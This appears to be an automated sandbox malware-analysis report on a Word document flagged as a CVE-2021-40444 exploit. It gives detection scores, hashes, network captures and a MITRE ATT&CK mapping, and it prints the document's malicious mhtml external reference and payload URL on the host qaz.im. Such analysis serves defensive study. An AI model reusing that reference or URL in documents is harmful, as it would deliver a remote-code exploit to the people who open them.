Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{636165D4-957F-4FF6-8584-BFA7FFC416EB}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: qaz.im

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Source: document.xml.rels, type: SAMPLE

Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: nnxPt0Yydv.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$xPt0Yydv.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7020.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOC@1/17@9/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: nnxPt0Yydv.doc

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	13 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	13 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nnxPt0Yydv.doc	50%	ReversingLabs	Document-Office.Exploit.CVE-2021-40444
nnxPt0Yydv.doc	48%	Virustotal		Browse
nnxPt0Yydv.doc	100%	Avira	EXP/CVE-2021-40444.Gen

Source	Detection	Scanner	Label	Link
qaz.im	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6	0%	Avira URL Cloud	safe
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
qaz.im	82.202.173.45	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
82.202.173.45	qaz.im	Russian Federation		29182	THEFIRST-ASRU	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	696518
Start date and time:	2022-09-02 13:23:11 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	nnxPt0Yydv.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.evad.winDOC@1/17@9/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe
TCP Packets have been reduced to 100
Report size getting too big, too many NtQueryAttributesFile calls found.

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28879490407012426
Encrypted:	false
SSDEEP:	48:I3ZrsRB68BT/wV0yYRzCmrWIdIP+ltUQ+VrXJkVIPpIPOH:K+LLoOd/xU5kOH
MD5:	30075DA75A69E03B91CDC295A738FE71
SHA1:	5C8EB1D3F7DC5B502212314F6405B25C9766603C
SHA-256:	29A90C402102B1E2616519F5DE7AA09426AAAB3559494E5EBFDA3DA1DC16A660
SHA-512:	172699B6B75DA2A3074DCBE0C418C34D00F964C84BF758940DEF4A4718394AFF0AED477B184D25C1A9280522E7ABBCC6083143CBA88500A40B7C2A67A7B6F363
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zj....VF@.....a..S,...X.F...Fa.q............................r.$.eN.C....l?...........3-..L........A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

File type:	Microsoft Word 2007+
Entropy (8bit):	7.956139045669752
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	nnxPt0Yydv.doc
File size:	23549
MD5:	15b691f0c5d627e71fed8a5d34fb0328
SHA1:	1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:	3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
SHA512:	7e36de7c74b0b17d6a183125855da06a76c42e33506a76bc9450345d41267def85c0af982731a9d02c63ec80b7d8b425494ecde8cc2eb620012504801bdffb5d
SSDEEP:	384:6wbSPfEjTkNesdDL667HzVutGCWyDVwZekDN81WqiJo9RxvrvmWqNWNX/wv3eSNU:9AEXkNegL6eHEnTwZvZ81Wqi+vrvUoXr
TLSH:	3FB2D090C9B5045EE381E572D0887ACEF339F023C9A1A45C7332C5892BD759356A3A3B
File Content Preview:	PK........4.!U...p`...T.......[Content_Types].xmlUT......c...c...c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2022 13:24:11.893163919 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:11.893210888 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:11.893363953 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:11.904119015 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:11.904153109 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.106446028 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.106641054 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.118447065 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.118464947 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.119035959 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.119194031 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.374012947 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.415391922 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.447335005 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.447459936 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.447472095 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.447525024 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.460880041 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.460917950 CEST	443	49171	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:12.460963964 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:12.460978031 CEST	49171	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.723443031 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.723489046 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:18.724262953 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.724852085 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.724877119 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:18.843628883 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:18.843907118 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.858563900 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.858592987 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:18.859313011 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:18.877919912 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:18.919394016 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:19.005238056 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:19.005317926 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:19.005392075 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:19.005716085 CEST	49172	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:19.005734921 CEST	443	49172	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.186294079 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.186338902 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.186407089 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.187663078 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.187686920 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.317841053 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.318058968 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.347040892 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.347084045 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.347831011 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.510687113 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.551390886 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.578166962 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.578267097 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.578324080 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.578752995 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.578778028 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.578821898 CEST	49173	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.578836918 CEST	443	49173	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.580574989 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.580615044 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.580679893 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.580837965 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.580856085 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.701263905 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.701677084 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.701705933 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.703433990 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.703454018 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.870610952 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.870650053 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.870712042 CEST	443	49174	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:22.872196913 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:22.872539043 CEST	49174	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.004606962 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.004674911 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.004776001 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.005217075 CEST	49175	443	192.168.2.22	82.202.173.45
